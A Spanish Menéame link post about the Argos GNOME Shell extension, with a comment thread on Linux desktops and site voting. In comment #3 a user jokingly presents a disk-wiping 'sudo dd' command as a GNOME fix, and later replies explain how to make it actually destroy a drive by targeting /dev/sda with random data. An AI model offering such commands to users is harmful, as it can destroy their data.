Hace 7 años | Por --486723-- a atareao.es
Publicado hace 7 años por --486723-- a atareao.es

Mientras me hago a las extensiones de GNOME Shell, he encontrado un extensión que seguro va a hacer las delicias de mas de uno. ¿Quién no ha querido hacer una extensión de GNOME Shell en unos segundos?. Si ese es tu caso, Argos es la solución para ti. La mayoría de las extensiones, indicadores, etc, en GNOME Shell, hacen una única cosa, añadir un botón con un menú desplegable al panel. En ocasiones también pueden mostrar algún tipo de información o alguna funcionalidad.

Comentarios

D

#7 tú sí que sabes!

D

#12 positivo de otro lubuntero.

D

#13 #12 estupendo Lubuntu. Lo tengo en ordenadores que tienen más de diez años y marchan mejor que cuando se estrenaron, con sus limitaciones claro, no puedes abrir cuarenta pestañas en el navegador, pero en general no recuerdo otro que haya ido tan bien.

Espartalis

#12 Yo uso CentOs y Mint, pero cuando usaba Ubuntu siempre usé Xubuntu, que es la versión con XFCE. No es tan tan ligero como LXDE, pero sigue siendo perfectamente funcional en ordenadores antiguos y es un poco más vistoso que Lubuntu.

Muy recomendado también.

Su web: https://xubuntu.org/

D

#24 Y además tiene una versión mi con la que solo te instala los componentes básicos del XFCE y a partir de ahi tú te instalas solo lo que te interese.

frankiegth

#24 Pues cuanto más uso Lubuntu más vistoso me parece Lo de que 'la belleza está en el interior' el escritorio/proyecto LXDE lo toma al pie de la letra, y exteriormente la última versión es muy resultona.
(CC #12)

Verbenero

#21 Y como ha llegado a portada y ha salido el aviso de envío controvertido, ahora aparecen los vampiros del karma a hundirlo y así cobrarse su recompensa. El interés del envío ya tal.
Ocurre todos los días.wall

Mister_Lala

#23 Es lo que se llama "morir de éxito"

D

#0 La quiero!

D

#46 Hoy en día Menéame ha perdido muchísimo respecto a su pasado. Unos pocos votos negativos hunden la noticia.
Eso sí, el sensacionalismo llega a portada "Ubuntu hackeado en la Pwn2Own 2017". En fin... cada vez entro menos a Menéame y posiblemente algún día no vuelva

Zeratul

Bueno, la falta de gente haciendo extensiones no es tanto por lo mal documentada que está el API, como porque con cada nueva versión se rompía la compatibilidad de los temas y las extensiones. Cuando Gnome 3 fue presentado hubo bastante intereses por ampliarlo y crear temas, pero la mayoría acabaron hartos de tener que rehacer su trabajo cada 6 meses, que es el plazo normal entre versiones.

Y muy interesante la extensión Argos, parece muy personalizable y potente.

D

Justo hace un par de días descubrí esta extensión y es genial. Ahora puedo hacerme una extensión sencilla en apenas unos minutos solo usando bash (aunque realmente puedes usar 'lo que quieras' ) . Hace tiempo estuve mirando cómo se supone que han de hacerse para gnome y no entendí nada. Me suscribiré al sub. #0 gracias por el aporte, y no te cortes... Envía todo lo que te parezca interesante y pasa de trolls, karmas y toda esa mierda.

C

¿como? Una noticia de tecnología que requiere un conocimiento por encima del promedio.

Eso no puede ser, Meneame es el bar virtual donde se ventilan noticias de política y lo que se comenta con pasión es absolutamente irrelevante que no sirve absolutamente para nada en la vida real, pero deja el gustico de hacer algo bueno por el pais (aunque tenga menos efecto que una medicina homeopatica).

Que vuelva bar-meneame-cuñado-experto-politico de relevancia real = 0.000

D

#32 Otro que no sabe lo que es un sub...es que estoy flipando...no es culpa mía que llegue a la portada general,de hecho preferiría que no lo hiciese,pero eso no lo decido yo.
La he enviado a un sub de noticias linux...cuánto hablar sin saber de qué

C

#33 yo se lo que es. Critico de forma irónica la actitud de los que votan negativo. Fijate, yo vote positivo.

D

#35 Ok,disculpa,te había entendido al revés.
De todas formas esto no debería salir en la portada general,por eso la envié a un sub y ahora me como negativos...en fín...menéame y sus algoritmos que nadie entiende..

D

#41 Lo que se ha convertido en un chiste son los usuarios que no saben lo que votan ni saben como funciona la página,si no te interesa no la votes,que pertenece a un sub queda bien claro,no es culpa mía que haya salido a la portada general,es algo que no pretendía,por eso la envío a un sub.CAMPEÓN

D

#44 Sé lo que voto, por eso le he dado a irrelevante. Estaba en portada, a mi qué coño me cuentas si lo has pue4sto en sub, lo veo en portada y voto irrelevante, es lo que hay.

D

#45 Entonces,una noticia de linux en un sub de linux es irrelevante?...la culpa,evidentemente, no es tuya,no entiendo porque sube a la portada general...en fín...eres libre de votar lo que te parezca y yo libre de enviar o no más noticias...con estas chorradas me da que no

Vamvan

#36 Yo termine muy cansado del gnome2 por eso no toco mate. Eso si, para mi gnome 3 es lo mejor pese a estar actualmente con kde ( al que le queda muy poco ) lol

D

Entrega de armas de eta... amenaza de trump con guerra a korea del norte... pero bueno, sigamos chicos con el "boikot" y colgando lo realmente importante! wall

D

#29 Sabes qué es un sub?,esta noticia forma parte del sub linux...antes de decir chorradas aprende como funciona la página

D

#31 Sí sé que es un sub, campeón, a parte que me da igual... esto estaba en portada, como la mayoría de "noticias".
Antes entraba en esta página para informarme de la actualidad... cuánta calidad ha hecho perder el dichoso boikot...
Esta página se ha convertido en un chiste de lo que era.

D

Usas Gnome Shell? Con este comando mejorarás Gnome:
sudo dd if=/dev/null of=/ bs=1M

De nada.

e

#3 Tio no seas tan mamón lol

D

#4 Es el odio que le tengo al engendro ese...

d

#5 aún estoy aprendiendo, pero basicamente ese comando seria mandar todo el disco duro a dev/null, ¿no? y claro dev/null, al anular todos los datos que se le manden, iria borrando todos los datos hasta que se quedaras sin nada, algo así como mandar el disco duro entero a la papelera de reciclaje.

paleociencia

#3 negativo al canto, que soy de esos que copia y pega comandos a lo loco sin saber na... y además me encanta GNOME

D

#9 Supongo que no viviste el cambio de Gnome 2.32 a la basura de Gnome 3, ¿no? roll

paleociencia

#10 De hecho usaba ubuntu antes y cuando salio gnome3 me pase a gnome 3. No me gusta Unity. También es verdad que es la que mejor se adaptaba a mi toshiba qosmio cuando la compré y ahora ya se me hace raro otro escritorio. La verdad, se me hace muy intuitivo como está ahora, no entiendo porqué la gente le tiene mania.
Gnome 2 creo recordar era un escritorio más clasico, hay muchas distros con un tipo de escritorio de ese estilo si no me equivoco. Aunque tal vez sí me equivoque, porque no sé tanto de linux y sus distros y menos de hace más de 3-4 años que es cuando empecé de forma continua con linux

ronko

#10 Yo viví la transición en mi pc de Gnome 2.32 a Mate Desktop y con un par de ajustes lo tengo igual incluido iconos y apariencia.

e

#10 Usa mate o xfce y se feliz.

PD: Gnome Shell ha mejorado mucho en últimas versiones. Ya es cuestión de gustos el que te guste más el estilo "antiguo" pero como escritorio moderno usable Gnome 3 hoy día no es un "engendro"

Vamvan

#10 He probado mate hace nada y es lo mismo que volver al gnome 2 de hace 10 años, ni con tu palo lol

D

#27 Bueno, esa era la gracia. Hace mucho que no los pruebo, pero sól por Nautilus y el soporte a GTK, seguramente prefiera MATE a XFCE, por ejemplo.

c

#3 Me dice que permiso denegado...

Grasias de antebrazo

D

#17 Entonces deberías probar a meter el disco duro en el microondas.

yusavi

#3 Se te ha olvidado indicar que debes usarlo como usuario root y añadir --sinmieo

D

#20 Para eso es el sudo

tresypico

#3 Troll fail

1. No vas a poder usar '/' como salida, es un directorio, 'dd' trabaja sobre ficheros. Deberías usar 'of=/dev/sda' como poco (y aún así acertarías de casualidad)

2. '/dev/null' te devolverá un 'EOF' en cuanto intentes leer nada, sobre un fichero normal tendrá el efecto de truncarlo a 0 bytes pero sobre un dispositivo de bloques (que es lo que querías hacer) seguramente no tendrá ningún efecto ya que no llegaras a escribir nada y no puedes truncar un dispositivo de bloques

D

#22 Para ser sincero, lo del /dev/sda me surgieron las dudas en cuanto envié el comentario, pero no podía -ni puedo- probarlo y pensé: bueno, si alguien le da por hacerme caso y no funciona, eso que se lleva. En cuanto a lo de tener suerte con sda, no creo que la gente de normal manipule el fstab (o lo que sea para que el principal sea siempre sda), puede ser que enciendas el ordenador con un pen usb y ese sea el sda, sí; pero vamos, siempre se cargaría algo.

Sobre el punto 2, sí que tiene efecto. Lo único malo es que da error cuando se queda sin sitio donde escribir.
Supongo que también puedes usar /dev/zero, pero yo siempre he tirado de null.

t

#34 Mucho mejor /dev/random. Si machacas con valores constantes es posible recuperar la info, con valores aleatorios no hay tu tía.

tresypico

#c-34" class="content-link" style="color: rgb(227, 86, 20)" data-toggle="popover" data-popover-type="comment" data-popover-url="/tooltip/comment/2747856/order/34">#34 No. No se que tipo de sistema extraño usarás, pero no, `dd` no funciona sobre directorios

# dd if=/dev/null of="/tmp/test" bs=1M
dd: No se puede abrir '/tmp/test': Es un directorio

Veamos que hace en concreto....

# strace -f dd if=/dev/null of="$PWD" bs=1M 2>&1 | grep open
open("/etc/ld.so.cache", O_RDONLYO_CLOEXEC) = 3
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLYO_CLOEXEC) = 3
open("/usr/lib/locale/locale-archive", O_RDONLYO_CLOEXEC) = 3
open("/dev/null", O_RDONLY) = 3
open("/tmp/test", O_WRONLYO_CREATO_TRUNC, 0666) = -1 EISDIR (Is a directory)

Por otra parte no se trata de manipular el fstab, '/' siempre será '/', pero si quieres destruir un disco has de atacar el dispositivo de bloques (SATAs: sd[a-z] o en SSDs modernos nvme[0-9]n[0-9]*) y como comenta #38, mejor usar random o urandom.